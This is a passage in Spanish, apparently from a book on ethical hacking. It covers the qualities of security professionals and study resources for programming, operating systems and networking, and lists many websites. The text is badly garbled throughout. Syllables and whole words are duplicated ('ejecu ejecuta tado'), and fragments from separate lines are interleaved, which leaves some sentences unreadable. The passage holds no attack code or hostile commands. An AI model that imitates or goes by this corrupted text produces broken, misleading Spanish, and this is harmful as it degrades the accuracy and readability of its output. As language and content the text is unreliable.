Descu cubrir brir manual manualmen mente te descui descuidos dos en el obje objeti ti vo.  vo. Desc De scub ubri rirr vul vulne nera rabi bililida dades des presen presentes tes de todo todo el esce escena nario rio técni técnico. co. Buscar lógi lógica ca e ilógi ilógica camen mente. te. Proyec yectar tarse se sobre sobre la marcha marcha en modo modo abstrac abstracto, to, tácti táctica ca y estra estraté tégi gica camen mente. te. Ser exhaus hausti ti vo,  vo, pero pero a la vez saber sa ber cuándo cuándo es el momento de recu recurrir rrir a la disten disten-sión (para (para no agotar agotar la mente). mente). • Ser éti tico co por sobre sobre todas todas las cosas. cosas. Si estas estas condi condicio ciones nes perso persona nales les y cultu cultura rales les del profe profesio sional nal no son las adecua adecuadas das (por tener tener poco poco inge ingenio, nio, poca poca cultu cultura ra gene general ral o imagi imagina nación ción que impi impida da ejecu ejecutar tar-las), éste éste no será será eficien eficiente te en su traba trabajo. jo. No tendrá tendrá el valor valor agrega agregado do de quien va más allá de las meto metodo dolo logías gías que se pueden pueden inter interpre pretar tar siguien siguiendo do un simple simple checchecklist o un deter determi mina nado do ma manual nual de proce procedi dimien miento to. Una caren carencia cia en algu alguno no de estos estos aspec aspectos tos podría podría signi signifi ficar car el no descu descubrir brir una brebrecha poten potencial cial de segu seguri ridad dad apenas apenas percep percepti tible ble presen presente te en el siste sistema ma o que, a futu futu-ro, un atacan atacante te real más inte inteliligen gente te y expe experi rimen menta tado do sí lo haga. haga. Nadie Na die dijo dijo que esto esto era fácil. fácil. Para Para hacer hacer un chequeo chequeo de segu seguri ridad dad en un entor entorno, no,

no basta basta con sólo sólo colo colocar car a traba trabajar jar un scan scanner ner (bus (busca cador) dor) de vulne vulnera rabi bililida dades des sosobre una direc dirección ción IP y sentar sentarnos nos a espe esperar rar su resul resulta tado. do.

Retina.

Pantalla del buscador de vulnerabilidades Retina, de la empresa Eeye .

Un coción cole lega, ga, sobre debre nom nombre Cle Clement Du puis, lue go hizo dezodiscu diselcutir unotede astario: aspec pectos decelaeduca edu cación so sebre segu guri ridad dadment en laDupuis, lista lista Bugluego Bugtraq, traq, hi sitir siguien guiente colos comen menta rio:tos Nece Ne 17

 

si sita tamos mos gente gente técni técnica, ca, nece necesi sita tamos mos gente gente que mire mire todo todo el esce escena nario, rio, nece nece-sita si tamos mos gente gente con habi habili lida dades des socia sociales, les, nece necesi sita tamos mos gente gente sin habi habili lida dades des socia so ciales, les, pero pero con mucha mucha lógi lógica. ca. Es Esto to da una peque pequeña ña idea acerca acerca de los perfi perfiles les y carac caracte terís rísti ticas cas que se nece necesi sitan tan tanto tanto para para la parte parte técni técnica ca como como para para la gestión, gestión, la comu co muni nica cación ción y la reso resolu lución ción de proble problemas mas lógi lógicos. cos. Llegar Llegar a ser un profe profesio sional nal muy  bueno, bue no, que pueda pueda mane manejar jarse se cómo cómoda damen mente te en todos todos o en gran parte parte de los perfi perfiles, les, puede pue de reque requerir rir varios varios años de estu estudio, dio, prácti práctica ca y traba trabajo. jo. Son tantas tantas las varia variables bles y  compo com ponen nentes tes tecno tecnoló lógi gicos cos in vo  volu lucra crados dos (además (además de la nece necesi sidad dad de mante mantener nerse se constan cons tante temen mente te infor informa mados), dos), que es impo imposi sible ble cono conocer cerlos, los, enten entender derlos los y aplicar aplicarlos los

de un modo modo eficien eficiente te de un día para para otro.

Es impor importan tante te cono conocer cer proto protoco colos los de comu comuni nica cación. ción. En este este caso, caso, el mode modelo lo OSI. OSI.

Los compo componen nentes tes que apare aparecen cen a conti continua nuación ción son una gran parte parte del aspec aspecto to téctécnico ni co que hay que cono conocer cer y estu estudiar, diar, sin tener tener en cuenta cuenta todo todo aquello aquello que compren compren-de el mane manejo jo de polí políti ticas cas y norma normati ti vas  vas en el aspec aspecto to segu seguri ridad dad y orga organi niza zación ción (ges(gestión), suma sumado do a las cuestio cuestiones nes de origen origen perso personal nal o la capacidad de lle var adelan adelante te grupos gru pos y proyec proyectos. tos. Idiomas, Idiomas, siste sistemas mas opera operati ti vos,  vos, hard wa  ware, coman comandos, dos,  ware re, mal ware, lenguajes jes de pro net working   working  y to topo polo logías gías, au audi dito torías rías, lengua progra grama mación ción, ci cifra frados dos, aná aná-resulta tados, dos, conec conecto tores, res, vulne vulnera rabi bililida dades, des, herra herramien mientas, tas, técni técnicas cas de in lisis li sis de resul intru tru-18

 

databa bases, ses, dise diseño ño lógi lógico, co, aplica aplicacio ciones, nes, rele rele va  vamien mientos tos y pro sión, IDS, data proto toco colos los de comu co muni nica cación ción (fami (familia lia TCP/IP TCP/IP entre entre otros). El mate material rial es tan vasto vasto que podría podría alienar alienar a un ser huma humano no si este este no lo asimi asimila lara ra con caute cautela, la, y por ello es muy impor importan tante te no lidiar lidiar con mate material rial inútil inútil y tener tener bien presen pre sentes tes las fuentes fuentes correc correctas tas de estu estudio dio o prácti práctica. ca. Tratar Tratar de ver a la vez un popoco de todo todo es una pérdi pérdida da de tiempo, tiempo, que es lo más valio valioso so que tene tenemos. mos. Por ese moti mo ti vo,  vo, hay que dar darse se cuenta cuenta y tratar tratar de descu descubrir brir las apti aptitu tudes des y habi habililida dades des ( skills ca da uno, culti culti varse  varse de forma forma adecua adecuada da y practi practicar car o traba trabajar jar en base base a skills ) de cada

ello. La forma formación ción puede puede orientar orientarse se a medi medida da que el profe profesio sional nal o estu estudian diante te deci decida da hahacia qué lado lado desea desea incli inclinar narse se en la mate materia, ria, ya que no es lo mismo mis mo ser un desa desarro rro-llador lla dor de ex redactar tar polí políti ticas cas de acce acceso so físi físico co en recin recintos tos o conconexploits ploits en C++ que redac figu fi gurar, rar, de modo modo segu seguro, ro, un ser vidor  vidor Linux. Linux. Si bien no se puede puede ser un exper experto to en todo, todo, lo más reco recomen menda dable ble es que, luego luego de domi do minar nar bien un perfil, perfil, se comien comience ce a estu estudiar diar los compo componen nentes tes de otro. Suma Sumado do a eso, hay que mante mantener nerse se bien infor informa mado do sobre sobre las vulne vulnera rabi bililida dades des actua actuales, les, las meto me todo dolo logías, gías, los recur recursos sos de asegu asegura ramien miento to y las medi medidas das de pre ven  vención. ción. Santiago Cavanna, profesional de la seguridad de la información, me hizo el siguiente comentario: “a veces es conveniente tambien cultivar el trabajo colaborativo entre varios especialistas, de esa manera, se cultiva la especialidad en profundidad y luego se desarrolla un tipo de conocimiento que permite integrarse en un equipo de trabajo.” tambien citó del libro “El arte de resolver Problemas” (isbn:968-18-1294-8) “El que tiene que tomar una decisión trata de elegir un curso de acción que produzca el resultado deseado, uno de que sea eficaz respecto a lo que el valora. Estos cursos de acción se conocen como efectivos. La efectividad es producto de la eficiencia y el valor. El que busca el mejor y más efectivo curso de acción se dice que optimiza. El que busca una solución que sea suficientemente buena, se dice que satisface.”

Eficaz o eficiente eficiente eficaz caz y efi eficien ciente te con La dife diferen rencia cia entre entre ser efi consis siste te en que el prime primero ro sólo sólo cumple cumple con el ob je  jeti tivo, vo, mientras mientras que el segun segundo do no sólo sólo lo cumple, cumple, sino sino que lo hace hace gene generan rando do el menor me nor gasto gasto de recur recursos sos (ya sea tiempo, tiempo, dine dinero, ro, herra herramien mientas tas o perso personal nal invo involu lucra crado). do).

19

 

En www.whi www.white tehat hatsec sec.c .com om ha hayy do docu cumen mentos tos en inglés inglés acerca acerca de vulne vulnera rabi bili lida dades des y técni técnicas cas muy inte intere resan santes. tes. Whitehat.

RECUR RE CURSOS SOS PARA PARA EL ESTU ESTUDIO DIO Los moti moti vos  vos por los que alguien al guien puede puede llegar llegar a dedi dedicar carse se al ethi ethical cal hacking hacking son vavariados, ria dos, y algu algunos nos géne géneros ros pueden pueden desta destacar carse se más que otros. Por un lado, lado, pode podemos mos mencio men cionar nar aquellos aquellos que la ven como como una inte intere resan sante te rama rama de la infor informá máti tica ca de nuestros nues tros tiempos, tiempos, o que nece necesi sitan tan cono conocer cerla la porque porque su posi posición ción en el traba trabajo jo así se los deman demanda. da. También También existen existen quienes quienes llega llegaron ron hasta hasta aquí por su pasión pasión tempra temprana na o más recien reciente, te, hacia hacia los siste sistemas mas como como hobbie. hobbie. Tampo Tampoco co faltan faltan quienes quienes vieron vieron alalguna gu na pelí pelícu cula la y se fasci fascina naron ron con los perso persona najes jes del tipo tipo hacker hacker llama llamados dos Ze Zero ro último, mo, existen aquellos aquellos que desean desean gene generar rar y obte obtener ner gagaCool o  Acid Burn. Por últi

Cursos de inglés Si quere queremos mos aprender aprender inglés inglés de forma forma no presen presencial cial u obte obtener ner certi certifi fica cacio ciones nes inter interna na-ciona cio nales, les, pode podemos mos visi visitar tar sitios sitios como como Roset RosettaS taSto tone ne (www.ro (www.roset settas tasto tone ne.com), .com), Pimsleur Pimsleur (www.pims (www .pimsleu leurap rapproach proach.com), .com), Univer University sity of Cambrid Cambridge ge (www.cam (www.cambrid bridgee geeso sol.org), l.org), IELTS (www. (www. ielts.org), ielts.org), Euro EuroTalk Talk (www.eu (www.euro rotalk talk.co.uk) .co.uk) y Bulats Bulats (www.bu (www.bulat lats.org). s.org).

20

 

nancias comer nancias comercia cialilizan zando do produc productos tos o ser vi  vicios cios rela relacio ciona nados dos con la mate materia. ria. Lógi Ló gica camen mente, te, no todos todos los que ingre ingresan san en el tema tema lo transi transitan tan con la misma misma forma forma-ción, ya sea acadé académi mica, ca, formal formal o auto autodi didac dacta, ta, sal vo  vo en la etapa etapa bási básica ca de educa educación. ción. Quizá Qui zá sea éste éste el único único punto punto en el que pueden pueden alcan alcanzar zar cierto cierto grado grado de simi simililitud tud o equililibrio equi brio en la prepa prepara ración. ción. En cuanto cuanto al resto resto de las etapas, etapas, esa prepa prepara ración ción es dedemasia ma siado do difu difusa sa por el proble problema ma de mode modelo lo educa educacio cional. nal. Por tal moti moti vo,  vo, la la forma formación ción sobre el tema sobre tema está está más liga ligada da al aspec aspecto to au experien riencia cia que a un mode mode-auto todi didac dacta  ta y de expe lo de carre carrera ra foca focaliliza zado do y espe especial cialmen mente te dise diseña ñado. do. Los recur recursos sos de forma formación ción reco reco-menda men dados dos que vere veremos mos en este este capí capítu tulo lo están están di vidi  vididos dos en cuatro cuatro etapas etapas funda fundamen men-tales: ta les: • • • •

Forma mación ción bási básica. ca. Educa cación ción auto autodi didac dacta. ta. Educa cación ción formal. formal. Traba bajo jo & prácti práctica: ca: expe experien riencia. cia.

Forma For mación ción bási básica ca Es muy proba probable ble que la mayo mayoría ría de los lecto lectores res de este este libro libro hayan hayan pasa pasado do por esta esta etapa eta pa junto junto a educa educado dores, res, padres padres o tuto tutores. res. Esta Esta etapa etapa inicial inicial es la base base de una temtemprana pra na educa educación. ción. Por más absur absurdo do que parez parezca, ca, este este tipo tipo de forma formación ción inte intelec lectual tual bábásica si ca tiene tiene clara clara inci inciden dencia cia en el desem desempe peño ño de un profe profesio sional nal de siste sistemas, mas, más allá de la espe especia cialilidad dad que éste éste elija elija cuando cuando sea adulto. adulto. En esta esta etapa etapa pode podemos mos mencio mencionar: nar: • La fami milia lia y el cole colegio gio como como prime primeros ros contac contactos tos con la infor informá máti tica ca formal formal e ininformal. for mal. Estí Estímu mulos, los, ambien ambiente, te, intro introduc ducción ción en las mate matemá máti ticas. cas. • El estu tudio dio de idiomas idiomas como como el in inglés glés, fundamental en infor informá máti tica ca para para la inter inter-preta pre tación ción de manua manuales les y la comu comuni nica cación ción en listas listas de correo. correo. • Añ Años os te tem mpra pranos nos en los que se alienta alienta a socia socialilizar, zar, jugar jugar en equipos, equipos, parti partici cipar par de actos ac tos y hacer hacer amista amistades. des. • Jugar al aje como mo desa desarro rrollo llo de la lógi lógica ca estra estraté tégi gica ca y tácti táctica. ca. ajedrez  drez  co • Juegos de in como mo estí estímu mulo lo de capa capaci cida dades des analí analíti ticas cas y reso resolu lución ción de proble proble-inge genio nio co

Juegos de ingenio Internet Inter net es una fuente fuente inago inagota table ble de recur recursos. sos. Si quere queremos mos me jo  jorar rar nuestra nuestra capa capaci cidad dad e inge ingenio nio median mediante te juegos, juegos, pode podemos mos ingre ingresar sar en sitios sitios como www.mle www.mlevi vitus tus.com, .com, wwwwww.juegos .jue gosdein deinge genio.org, nio.org, www.pum www.pumbo bo.co .com/in m/inde dex. x.ph php? p?g= g=22 y www www.men .mensa.es sa.es/jue /juegos gosmen men-sa/jue sa /juegos.html. gos.html.

21

 

mas. • Incen centi ti vo  vo del hábi hábito to de la lec dará cierta cierta faci facililidad dad para para redac redactar tar y comu comu-lectu tura  ra , que dará nicar ni carse se mejor mejor con dife diferen rentes tes tipos tipos de perso personas, nas, y ayuda ayudará rá al desa desarro rrollo llo de la crea crea-ti vidad   vidad  y de la ima imagi gina nación ción. • Por úl últi timo, mo, algo algo muy impor importan tante: te: cono conocer cer lo mo moral ralmen mente te correc correcto to.

Ajedrez. En el sitio sitio www.a www.a je  jedrez drez21.com, 21.com,

encon en contra tramos mos recur recursos sos dedi dedica cados dos al aprendi aprendiza za je del ajedrez. ajedrez.

Educa Edu cación ción auto autodi didac dacta ta Ser au signi nifi fica ca estu estudiar diar por cuenta cuenta propia. propia. Permi Permite te la elección elección propia propia y es auto todi didac dacta ta sig la que más perfi perfila lará rá al futu futuro ro profe profesio sional nal de segu seguri ridad, dad, ya que se comien comienza za estu estudian dian--

Hola mundo

El ¡Hola ¡Hola mundo! mundo! es cono conoci cido do por ser lo prime pri mero ro que se inten intenta ta en cualquier cualquier lengua lengua je de progra programa mación. ción. Esta Esta prácti práctica ca consis consiste te en impri imprimir mir esas dos pala palabras bras en la panta pantalla lla cuando cuan do es ejecu ejecuta tado do el peque pequeño ño progra programa ma que se desa desarro rrolla. lla. Pode Podemos mos encon encontrar trar más infor in forma mación ción y ejemplos ejemplos en http://es http://es.wi .wiki kipe pedia.org dia.org/wi /wiki ki/Ho /Hola la_mun _mundo. do.

22

 

gusto, afini do por gusto, afinidad dad y libre libre elección elección del mate material. rial. Para Para ser un buen profe profesio sional nal en segu se guri ridad dad infor informá máti tica ca o de la infor informa mación, ción, con vie  viene ne aprender aprender este este tipo tipo de cosas: cosas: • Aprender a pro proble blemas mas lógi lógica camen mente. te. progra gramar mar y ana anali lizar zar pro •  Ad siste sis temas mas opera operati ti vos  vos dife di feren rentes tes y con .  Admi minis nistrar trar confi figu gurar rarlos los • Aprender acerca acerca de net working  working y proto protoco colos los de comu comuni nica cación. ción. • Cono nocer cer segu seguri ridad dad infor informá máti tica ca y de la infor informa mación, ción, princi principal palmen mente te las técni técnicas cas más usuales usuales de intru intrusión sión y los méto métodos dos de gestión. gestión. ¿Cómo se aprende ¿Cómo aprende a progra programar? mar? Simple Simplemen mente te progra programan mando. do. Ya sea desde desde cero cero (con el famo famoso so ¡Ho  ) o miran mirando do códi código go fuente fuente ajeno ajeno y tratan tratando do de inter inter-¡Hola la mundo! mundo! ) pretar pre tar qué fue lo que inten intentó tó hacer hacer el autor, autor, pensar pensar cómo cómo podría podría haber haberlo lo hecho hecho memejor y luego luego opti optimi mizar zarlo. lo. Estas Estas premi premisas sas son váli válidas das bajo bajo cualquier cualquier idioma idioma de proprograma gra mación, ción, que no son más que co determi mina nada da sin (forma ma de escri escri-coman mandos dos, deter sinta ta xis (for birlo) y ló birlo) para ra la reso resolu lución ción del proble problema. ma. Aunque Aunque requie requiere re dedi dedica cación, ción, puepuelógi gica  ca  pa de progra programar mar quien se lo propon proponga ga y haga haga el sacri sacrifi ficio. cio. La dife diferen rencia cia en cali calidad dad la dará da rá el esfuer esfuerzo zo y la lógi lógica ca creati creati va  va de ca cada da uno, que nos lle va  vará rá a hacer hacer lo mismo mismo en diez o en mil líneas lí neas de códi código, go, o bien en diez o en mil horas ho ras de traba trabajo. jo. Progra Pro gramar mar o saber saber in inter terpre pretar tar códi código go fuente fuente se será rá de gran utili utilidad dad para para muchas muchas cocosas rela relacio ciona nadas das con la segu seguri ridad dad infor informá máti tica. ca. Nos ayuda ayudará rá a solu solucio cionar nar proble problemas mas dentro den tro de un siste sistema ma (con progra programa mación ción bash, scrip scripting  ting y WSH en entor entornos nos Linux Linux o Windows), Windows), a construir, construir, o modi modifi ficar, car, pruebas pruebas de concep concepto to de cualquier cualquier tipo tipo y ararquitec qui tectu tura ra o lengua lenguaje. je. También También nos ser virá  virá para para reali realizar zar admi adminis nistra tración ción avanza avanzada da median me diante te scripts, hacer hacer y modi modifi ficar car herra herramien mientas tas o aplica aplicacio ciones nes y audi auditar tar códi código go propio o ajeno. propio ajeno. Por otro lado, lado, nos permi permiti tirá rá mi idioma a otro, migrar grar códi código go de un idioma modi mo difi ficar car open source source (códi (código go fuente fuente de siste sistemas mas Linux Linux por ejemplo), ejemplo), hacer hacer in inge ge-niería nie ría in ver  versa  sa de parches, parches, mal ware  ware o aplica aplicacio ciones nes y depu depurar, rar, entre entre otras cosas. cosas. Con estos es tos cono conoci cimien mientos, tos, también también podre podremos mos tes testear tear apli aplica cacio ciones nes onli online ne o en red de forforma local, local, op opti timi mizar zar to todo do tipo tipo de códi código, go, au auto toma mati tizar zar se secuen cuencias cias de coman comandos, dos, hahacer repor reportes, tes, moni monito toreos, reos, flujo flujo de datos datos o acce accesos sos y prote proteger ger códi código go median mediante te el emempaque pa queta tamien miento to de bina binarios, rios, por ejemplo. ejemplo. Como Como vemos, vemos, las posi posibi bililida dades des son mumuchas.

Diagra  mación sin PC Diagra

Si desea deseamos mos crear diagra diagramas mas de forma forma manual, manual, en las libre librerías rías pode podemos mos conse conseguir guir didiversas ver sas planti plantillas llas para para est esto según la norma norma IRAM 36002. Al esti estilo lo de los stencils, stencils, estas estas planti plan tillas llas plásti plásticas cas tienen tienen dife diferen rentes tes utili utilida dades des y aplica aplicacio ciones, nes, como como pode podemos mos ver en www.plan www .plantec tec.co .com.ar m.ar/lo /local-cgi cal-cgi/ver /verca cate tego goria.c ria.cgi gi?co ?codi digo=9 go=9.

23

 

No es ne nece cesa sario rio aprender aprender todos todos los lengua lenguajes, jes, ya que son dece decenas nas y podría podría lle var  var-nos muchos muchos años sin que alcan al cance cemos mos a darles darles una real aplica aplicación. ción. Es muy impor impor-tante tan te que un buen progra programa mador, dor, una vez expe experi rimen menta tado, do, progra programe me de modo modo segu segu-ro. Una tempra temprana na y buena buena prácti práctica, ca, que hoy no se acostum acostumbra bra a estu estudiar, diar, es la dia diagra gra-válida da también también para para iniciar iniciarse se en algu algunos nos lengua lenguajes jes de progra programa mación ción mación ma ción lógi lógica  ca , váli (del tipo batch) ya que faci fa cililita ta el desa desarro rrollo llo de la ló lógi gica ca secuen secuencial cial.

Diagrama. En este este diagra diagrama ma hecho a mano, que se tienen tienen

que mostrar mostrar en panta pantalla lla núme números ros entre entre 1 y 100. Condi Condición ción falsa falsa (F), condi con dición ción verda verdade dera ra (V). El gráfi gráfico co de rombo rombo equiva equivale le a un IF o de deci cisión. sión.

Listas de correo

De la misma misma mane manera ra que en los foros, foros, pero pero median mediante te correos correos electró electróni nicos, cos, pode podemos mos obtener te ner ayuda ayuda en las listas listas de correo. correo. Para Para encon encontrar trar estas, estas, ingre ingresa samos mos en sitios sitios como como wwwww.egru w.e grupos pos.net, .net, http://groups http://groups.goo .google.es, gle.es, http://es http://es.groups .groups.ya .yahoo hoo.co .com m o http http://groups ://groups.blog .blog-digger dig ger.c .com om y uti utili lizamos zamos pala palabras bras clave clave rela relacio ciona nadas das con el tema. tema.

24

 

Pa Para ra ayudar ayudarnos nos con nuestro nuestro aprendi aprendiza zaje, je, pode podemos mos recu recurrir rrir a Inter Internet, net, tanto tanto a sisitios como como a foros foros y listas listas de correo. correo. Por ejemplo, ejemplo, Psi mayor cocoPsicofxp cofxp.com .com es la mayor muni mu nidad on ne mación en ción español espa ñol y cuenta cuen ta con.com/fo excelen exce lentes tes foros fo/progra ros dedi de dica cados dos a tecno tecnolo logía. gía.  Tan  Tanto todad en onli proline progra grama (   ) como co mo  www.psi  www.p sicofxp cofxp.com /forums rums/pro grama macion.313 cion.313 en otras áreas IT, este este sitio sitio cuenta cuenta con gente gente dispues dispuesta ta a ayudar ayudarnos nos de mane manera ra dedesinte sin tere resa sada. da. Recu Recurrir rrir a foros foros de progra programa mado dores res es una muy buena buena alter alterna nati ti va,  va, en en especial cuando cuando recién comenzamos a progra programar mar de modo modo auto autodi didac dacta, ta, ya que pode po demos mos publi publicar car nuestra nuestra consul consulta ta y espe esperar rar a que progra programa mado dores res más expe experi ri-menta men tados dos nos respon respondan dan o guíen hasta hasta la solu solución. ción.

Psicofxp. En www.psi www.psicofxp cofxp.com, .com, pode podemos mos

encon en contrar trar mucha mucha ayuda ayuda cuando cuando comen comenza zamos mos a progra programar. mar.

 Además, en Inter  Además, Internet net pode podemos mos encon encontrar trar repo reposi sito torios rios de códi código go y tuto tutoria riales les de totodos los lengua lenguajes jes existen existentes. tes. Veamos Veamos algu algunos nos sitios. sitios.

FreeBSD, NetBSD y OpenBSD Si quere queremos mos aprender aprender más sobre sobre los siste sistemas mas opera operati tivos vos FreeBSD, NetBSD y OpenBSD, pode podemos mos visi visitar tar las siguien siguientes tes direc direccio ciones: nes: www.un www.undeadl deadly.org, y.org, www.el www.elde de-monio.org, mo nio.org, www.freebs www.freebsd.o d.org. rg.mx mx y www.bsd www.bsdfrea freak.org. k.org. En estos estos sitios, sitios, encon encontra trare remos mos tuto tu toria riales, les, nove noveda dades des e infor informa mación ción comple complemen menta taria ria que nos será de utilidad.

25

 

LEN LENGUA GUAJ JE

URL

Planet Source Planet Source Code Code Linux Li nux Script Scripting Progra Pro grama macción Bash Win32 Script Scripting Asssembly As Python Pyt hon C C++ Perl Visual Vi sual Bas Basic

www.pla www .planet-sour net-source-co ce-code de.com .com www.freeos .freeos.com .com/gui /guides/lsst des/lsst xinfo fo.sour .source cefor forge ge.net .net/do /docu cumen mentos/bash-scrip tos/bash-scripting ting// bash-script-2.0.html http://cwas washing hington ton.ne .netreach treach.net .net www.csn.u n.ul.ie l.ie/~darks /~darksta tar/as r/assem sembler bler/ma /manual nual www.python.co www.python .com.ar m.ar www.cti.ui ti.uib.es b.es/ME /MESIN SINFO FO/MA /MANUALS NUALS/CursC.pdf /CursC.pdf www.concla www.con clase se.net/c .net/c http://per ://perle lenes nespa panol nol.ba .baboon boonsoft softwa ware re.com .com www.vb-mundo do.com .com

P HPP AS Javas Ja vasccript

w phloasp.co p.net .com.ar ww ww w..so .soloasp m.ar www.ga .gama marod rod.co .com.ar m.ar Programación. Si Sitios tios en los que pode podemos mos encon encontrar trar mate ma terial rial sobre sobre distin distintos tos lengua lengua jes de progra programa mación. ción.

 Aprender  Apren der acerca acerca de los siste sistemas mas opera operati tivos vos Los grandes grandes esce escena narios rios suelen suelen estar estar compues compuestos tos por dife diferen rentes tes compo componen nentes tes o serser vidores  vido res bajo bajo plata platafor formas mas como como Unix, Sola Solaris, ris, Linux, Linux, FreeBSD, OpenBSD o WinWin-

dows Ser ver.  ver. Por lo tan tanto, no es reco recomen menda dable ble dedi dedicar carse se sólo sólo a cono conocer cer y admi adminis nis trar una plata platafor forma ma única única si esta estamos mos deci decidi didos dos a abordar abordar la segu seguri ridad dad infor informá máti tica ca en cuestio cuestiones nes técni técnicas cas (a menos menos que desee deseemos mos espe especia cialilizar zarnos nos y dele delegar gar el resto resto del traba tra bajo) jo) o bien formar formar parte parte de un equipo. equipo. Los chequeos chequeos de segu seguri ridad dad se pueden pueden lle var a cabo ca bo desde desde dife diferen rentes tes siste sistemas mas opeoperati ra ti vos  vos ya que no to todos dos ofrecen ofrecen las mismas mismas condi condicio ciones nes de traba trabajo, jo, versa versati tililidad dad y  herra he rramien mientas. tas. Para mejorar nuestros conocimientos, un buen comien comienzo zo es aprenaprender a admi adminis nistrar trar estos estos siste sistemas mas opera operati ti vos,  vos, cono co nocer cer cómo cómo funcio funcionan, nan, su confi configu gu-ración segu ración segura ra y de red, su estruc estructu tura ra inter interna, na, los coman comandos dos usuales usuales y los avanza avanzados, dos, los contro controles les que tiene, tiene, sus logs o archi archi vos  vos de audi audito toría, ría, cómo cómo insta instalar lar aplica aplicacio ciones nes en él y también también setear setearlas, las, cómo cómo actua actualilizar zarlo, lo, parchear parchearlo lo o modi modifi ficar carlo, lo, y ver la esestructu truc tura ra y las limi limita tacio ciones nes en los pri vile  vilegios gios de cada cada grupo grupo de usuarios. usuarios. Lógicamente, para para aprender aprender a admi adminis nistrar trar un ser vi  vidor, dor, ya sea Unix, Linux Li nux o WinWindows, prime primero ro hay que insta instalar larlo. lo. Luego Luego se deben deben utili utilizar zar sus coman comandos dos y estu estudiar diar su estruc estructu tura ra inter interna, na, gestio gestionar nar los usuarios usuarios del siste sistema ma y sus dife diferen rentes tes permisos, cono co nocer cer cada cada ser vicio  vicio nati nati vo  vo y desha deshabi bililitar tar aquellos aquellos que sean inne innece cesa sarios, rios, crear rerelacio la ciones nes de confian confianza za entre entre otros compo componen nentes tes en red a tra vés de di versos  versos méto métodos. También, También, audi auditar tar sus archi archi vos  vos de regis registro, tro, cono conocer cer bien los logs y cuál es la inin 26

 

formación forma ción rele rele van  vante te que se depo deposi sita ta en ellos, inten intentar tar el filtra filtrado do de proto protoco colos los y coconexio ne xiones nes exter externas, nas, mante mantener ner actua actualiliza zado do todo todo lo posi posible ble (inclui (incluido do el kernel kernel en el cacaso de Linux), Linux), deter determi minar nar qué cosas cosas no pueden pueden dejar dejarse se por defec defecto to (como (como passpass words, usuarios, usuarios, aplica aplicacio ciones, nes, paths o direc directo torios, rios, pri vile  vilegios, gios, confi configu gura racio ciones nes o ararchi vos),  vos), probar probar aplica aplicacio ciones nes y tecno tecnolo logías gías usuales usuales como como apache, apache, mysql u openssl. De ese modo, modo, se comien comienzan zan a aplicar aplicar los méto métodos dos de har signifi fica ca vol harde dening  ning , que signi  vol- vidor, y se van adqui adquirien riendo do nocio nociones nes de admi adminis nistra tración ción avanavan ver más segu seguro ro el ser vidor, zada. za da. A su vez, esto nos ayuda a cono conocer cer las carac caracte terís rísti ticas cas débi débiles les de un siste sistema ma insta ins tala lado do por default, default, lo que nos permi permiti tirá rá reco recono nocer cerlas las fácil fácilmen mente te en los futu futuros ros esce es cena narios rios en los que este estemos mos in vo  volu lucra crados. dos. La ins insta tala lación y late,admi adayuda minis nistra tración senir segu guras ras detromi ser  visión  vido dores res  vada a cabo ca(a botra de undel mosismodo dorealmen real mente teción eficiente, eficien ayu dará rá ación pre ve  venir la intro in misión enlle el va sisda siste tema ma  vés sis tema te ma opera operati ti vo)  vo) de alguien al guien no auto autori riza zado. do. De todos todos modos, modos, un siste sistema ma opera operati ti vo  vo es apenas apenas una puerta puerta entre entre la dece decena na de posi posibi bililida dades. des.

En www.bsdar www.bsdargen genti tina na.co .com.ar, m.ar, encon en contra trare remos mos foros foros y diver diverso so mate material rial acerca acerca de la fa fami milia lia BSD. BSD.

 Ante algu  Ante alguna na duda duda puntual puntual rela relacio ciona nada da con los siste sistemas mas opera operati ti vos,  vos, de debe bemos mos recor recordar dar que en Inter Internet net se encuen encuentran tran listas listas de correo correo de usuarios, usuarios, mailings mailings oficia oficiales les de los desa de sarro rrolla llado dores, res, mailings mailings de empre empresas sas con produc productos tos afines afines (por ejemplo ejemplo eEye), eEye), foforos de discu discusión, sión, cana canales les IRC, blogs, FTP, cursos, cursos, libros, libros, e-zines, e-zines, mono monogra grafías, fías, grugrupos de usuarios, usuarios, asocia asociacio ciones, nes, desa desarro rrolla llado dores, res, depó depósi sitos tos de aplica aplicacio ciones nes y códi código go fuente fuente.. 27

 

 Aprender  Apren der acerca acerca de networ networking king El cono conoci cimien miento to de net working  working y todo todo aquello aquello refe referen rente te a redes redes (como (como proto protoco colos los y conec conecto tores, res, routing routing y switching, switching, entre otras cosas) es bási bá sico co para para el dise diseño ño y la diagra dia grama mación ción de entor entornos nos de una orga organi niza zación, ción, pero pero resul resulta ta funda fundamen mental tal para para un futu fu turo ro profe profesio sional nal de ethi ethical cal hacking. hacking.

Los RF Los RFCC (R (Reequest For Comments) Comments) son los están estánda dares res que defi definen nen cada ca da uno de los compo componen nentes tes de Inter Internet. net. Consis Consisten ten en la lectu lectura ra bási básica ca y muy deta de talla llada da de los proto protoco colos los utili utiliza zados. dos. Los pode podemos mos ver en espa español ñol en www.rfc-es.org. RFC.

Esto Es to nos permi permiti tirá rá no sólo sólo lle var a ca cabo bo el chequeo chequeo de segu seguri ridad dad e inter interpre pretar tar el mapeo de los compo mapeo componen nentes, tes, sino sino también también deter determi minar nar exacta exactamen mente te el flujo flujo de infor infor-mación, ma ción, la dispo disposi sición ción de las ofici oficinas nas y sus compo componen nentes tes infor informá máti ticos, cos, las medi medidas das de pre ven  vención ción en el tráfi tráfico co de red, el alma al mace cena namien miento to de datos, datos, su acce acceso, so, su proproceso ce so o poste posterior rior enru enruta tamien miento, to, medi medidas das técni técnicas cas de contin contingen gencia cia y contro controles. les.  Al mis mismo mo tiempo, tiempo, nos permi permiti tirá rá estar estar capa capaci cita tados dos para para reco recomen mendar dar los compo compo-nentes nen tes nece necesa sarios rios de segu seguri ridad dad o conec conecti ti vidad  vidad como como DMZ, fire fire walls, crip cripto tosis siste te-mas, routers, routers, switchs, filtra filtrados dos varios, varios, IDS, data databa bases, ses, ser vido  vidores res segu seguros ros de archi archi- vos, ser vi  vido dores res de logs, ser vi  vido dores res de repli replica cación, ción, deter determi mina nados dos enla enlaces ces cifra cifrados, dos,  VPNs, VLANs, uni unida dades des de logueo logueo segu seguro, ro, cablea cableado do estruc estructu tural ral blinda blindado, do, etcé etcéte te-ra. Entre todo el material disponible, lo princi prin cipal pal es cono conocer cer cómo cómo se comu comuni nican can esestos elemen elementos tos (suma (sumado do a los ser vi  vido dores res y termi termina nales) les) entre entre sí, sus capas, capas, sus proto proto-28

 

colos, los, su confi configu gura ración ción y las normas normas técni técnicas cas de cada cada uno. co

